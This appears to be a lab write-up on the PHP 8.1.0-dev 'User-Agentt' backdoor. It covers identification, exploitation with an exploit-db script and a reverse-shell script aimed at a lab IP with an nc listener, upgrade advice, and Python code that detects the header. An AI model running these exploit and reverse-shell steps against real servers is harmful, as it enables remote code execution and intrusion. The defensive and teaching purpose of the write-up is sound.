PHP version 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending a crafted User-Agentt header.
The original code was restored after the issue was discovered, but it was then tampered with a second time. The breach would have created a backdoor in any website that ran the compromised version of PHP, enabling attackers to perform remote code execution on the site.
Identification
1. One way to identify whether a website is running PHP 8.1.0-dev is to request only the headers with curl and look for the PHP version in the server response (typically the X-Powered-By header)
- curl --head http://10.10.10.242
2. The same header can also be seen in the server response in Burp Suite
Exploitation
Script 1 (PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution)
1. This script exploits the User-Agentt backdoor and provides a shell (https://www.exploit-db.com/exploits/49933)
- curl https://www.exploit-db.com/download/49933 -o exploit.py
- ls -l exploit.py
2. Run it against the vulnerable website
- python3 exploit.py
- http://10.10.10.242/
- whoami
Script 2 (Reverse Shell)
1. Download the script from (https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py)
2. I named the file exploit2.py
- python3 exploit2.py -h
3. Start a listener on the attacker machine
- nc -lvp 3333
4. Run the script with the target URL, the attacker IP and the listener port
- python3 exploit2.py http://10.10.10.242/ 10.10.14.6 3333
5. Check the listener; there should be a connection back
Remedy
Upgrade to a PHP build that does not contain the backdoor; see the vendor information for details
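The identification step above relies on the PHP version advertised in the response headers, and the exploitation step relies on a request header (User-Agentt) that no legitimate client sends. The following added example (not code from this page, exploit-db or the flast101 repository) shows both sides from a defender's point of view: fingerprinting the advertised PHP version from a raw header block like the one `curl --head` prints, and flagging requests that carry the User-Agentt header in access logs or proxy captures. All header blocks and log lines are constructed for the example, and the log layout assumes a custom Apache LogFormat that records the User-Agentt request header with `%{User-Agentt}i` (the default combined format does not log it).

```python
"""Defensive checks for the PHP 8.1.0-dev 'User-Agentt' backdoor.

1. fingerprint_php_version / is_backdoored_build: parse an HTTP response
   header block (what `curl --head` prints) and report the PHP version
   advertised in X-Powered-By or Server.
2. find_user_agentt_requests: scan access-log lines that record the
   User-Agentt request header and flag any request carrying it.
3. request_carries_user_agentt: same check on a raw request captured by a
   proxy such as Burp Suite.
All sample data below is constructed for this example.
"""
import re

BACKDOORED_VERSION = "8.1.0-dev"

# Constructed response header blocks, shaped like `curl --head` output.
RESPONSE_BACKDOORED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.46 (Debian)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)
RESPONSE_PATCHED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "X-Powered-By: PHP/7.4.16\r\n"
    "\r\n"
)

# Constructed raw request as a proxy would capture it.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 10.10.10.242\r\n"
    "User-Agent: python-requests/2.25.1\r\n"
    "user-agentt: constructed-value\r\n"
    "\r\n"
)

# Constructed access-log lines.  Assumed LogFormat (Apache syntax):
#   "%h %l %u %t \"%r\" %>s %b \"%{User-Agent}i\" \"%{User-Agentt}i\""
# Apache writes "-" for the last field when the header was not sent.
SAMPLE_LOG = [
    '10.10.14.6 - - [28/Mar/2021:10:00:01 +0000] "HEAD / HTTP/1.1" 200 - "curl/7.74.0" "-"',
    '192.0.2.10 - - [28/Mar/2021:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512 "Mozilla/5.0" "-"',
    '10.10.14.6 - - [28/Mar/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 73 "python-requests/2.25.1" "constructed-value"',
]

PHP_VERSION_RE = re.compile(r"PHP/([0-9][\w.\-]*)")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ua>[^"]*)" "(?P<uat>[^"]*)"$'
)


def parse_headers(raw):
    """Turn a raw header block into a dict keyed by lower-cased header name.
    Lines without a colon (status/request line, blank line) are skipped."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint_php_version(raw_headers):
    """Return the PHP version advertised in X-Powered-By or Server, else None.
    None means 'not advertised', not 'safe' (expose_php may be off)."""
    headers = parse_headers(raw_headers)
    for field in ("x-powered-by", "server"):
        m = PHP_VERSION_RE.search(headers.get(field, ""))
        if m:
            return m.group(1)
    return None


def is_backdoored_build(raw_headers):
    return fingerprint_php_version(raw_headers) == BACKDOORED_VERSION


def find_user_agentt_requests(log_lines):
    """Return one record per log line whose User-Agentt field is present."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("uat") != "-":
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "request": m.group("request"), "user_agentt": m.group("uat")})
    return hits


def request_carries_user_agentt(raw_request):
    """True if a raw request block contains a User-Agentt header (any case)."""
    return "user-agentt" in parse_headers(raw_request)


if __name__ == "__main__":
    print("advertised:", fingerprint_php_version(RESPONSE_BACKDOORED),
          "backdoored:", is_backdoored_build(RESPONSE_BACKDOORED))
    for hit in find_user_agentt_requests(SAMPLE_LOG):
        print("User-Agentt request:", hit)
    print("proxy capture carries header:", request_carries_user_agentt(SAMPLE_REQUEST))
```

Any request carrying User-Agentt is worth an alert on its own, whatever the value, since the header is not used by real browsers or tools; a reverse proxy or WAF rule that drops requests containing it is a cheap stop-gap until the affected build is replaced. Note that a missing X-Powered-By header only means the version is not advertised, so inventory should be confirmed on the host (for example `php -v`) rather than from headers alone.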
Resources
https://www.exploit-db.com/exploits/49933
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
https://flast101.github.io/php-8.1.0-dev-backdoor-rce/